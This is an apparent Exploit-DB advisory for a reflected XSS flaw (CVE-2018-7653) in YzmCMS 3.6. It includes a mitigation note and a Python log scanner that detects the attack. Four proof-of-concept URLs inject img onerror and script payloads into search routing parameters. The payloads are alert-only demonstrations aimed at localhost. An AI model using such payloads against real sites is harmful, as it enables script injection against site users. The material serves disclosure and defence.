Vendor: YzmCMS
Author: zzw
CVSS: 6.1 (MEDIUM)
CWE: 79 (XSS)
Product Name: YzmCMS
Affected Version From: 3.6
Affected Version To: 3.6
Patch Exists: YES
Related CVE: CVE-2018-7653
CPE: a:yzmcms:yzmcms:3.6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
Year: 2018

YzmCMS 3.6 XSS Vulnerability

This is a reflected XSS vulnerability that can be used to attack users of the site. The PoC includes four URLs in which the m, c, a and modelid request parameters of the search page carry an injected HTML payload.

Mitigation:

Ensure that user input is validated against the expected form (the routing parameters here are identifiers and an integer) and HTML-encoded before it is reflected into a page.

Exploit-DB raw data:

# Exploit Title: YzmCMS 3.6 XSS Vulnerability
# Date: 2018-04-03
# Exploit Author: zzw (zzw@5ecurity.cn)
# Vendor Homepage: http://www.yzmcms.com/
# Software Link: http://www.yzmcms.com/
# Version: 3.6
# CVE : CVE-2018-7653

This is an XSS vulnerability that can attack the users.

poc:

http://localhost/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes 

http://localhost/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes 

http://localhost/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes 

http://localhost/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes
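As an added example (not part of the advisory or of YzmCMS), the following Python applies the mitigation above as a detection check: it decodes the query string of each request, enforces the expected shape of the m, c, a and modelid parameters, and flags the PoC pattern in access-log lines. The allowed shapes, the host name and the log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Expected shape of each YzmCMS routing parameter (assumption drawn from the
# legitimate values in the PoC: "search", "index", "init", "1"). The free-text
# search term q is deliberately not listed.
ALLOWED = {
    "m": re.compile(r"^[A-Za-z0-9_]+$"),
    "c": re.compile(r"^[A-Za-z0-9_]+$"),
    "a": re.compile(r"^[A-Za-z0-9_]+$"),
    "modelid": re.compile(r"^[0-9]+$"),
}
# Markup fragments that never belong in a routing parameter.
MARKUP = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)

def suspicious_params(url: str) -> dict:
    """Return {name: decoded value} for routing params that violate ALLOWED."""
    found = {}
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        if name not in ALLOWED:
            continue
        for value in values:
            # parse_qs decodes once; decode again to catch double-encoding.
            decoded = unquote(value)
            if not ALLOWED[name].match(decoded) or MARKUP.search(decoded):
                found[name] = decoded
    return found

def scan_access_log(lines):
    """Yield (line number, offending params) for combined-format log lines."""
    for n, line in enumerate(lines, 1):
        parts = line.split('"')          # request line sits between quotes
        fields = parts[1].split() if len(parts) > 1 else []
        if len(fields) < 2:
            continue
        bad = suspicious_params("http://host" + fields[1])  # host is a placeholder
        if bad:
            yield n, bad

# Constructed sample log (not real traffic): a benign search, then two PoC-style hits.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Apr/2018:10:00:00 +0000] "GET /YzmCMS/index.php?m=search&c=index&a=init&modelid=1&q=tes HTTP/1.1" 200 512',
    '10.0.0.9 - - [03/Apr/2018:10:00:01 +0000] "GET /YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes HTTP/1.1" 200 600',
    '10.0.0.9 - - [03/Apr/2018:10:00:02 +0000] "GET /YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes HTTP/1.1" 200 600',
]

if __name__ == "__main__":
    for n, bad in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {bad}")
```

The same ALLOWED table can be used server-side to reject a request before the parameter is ever echoed, which is the fix the mitigation section describes.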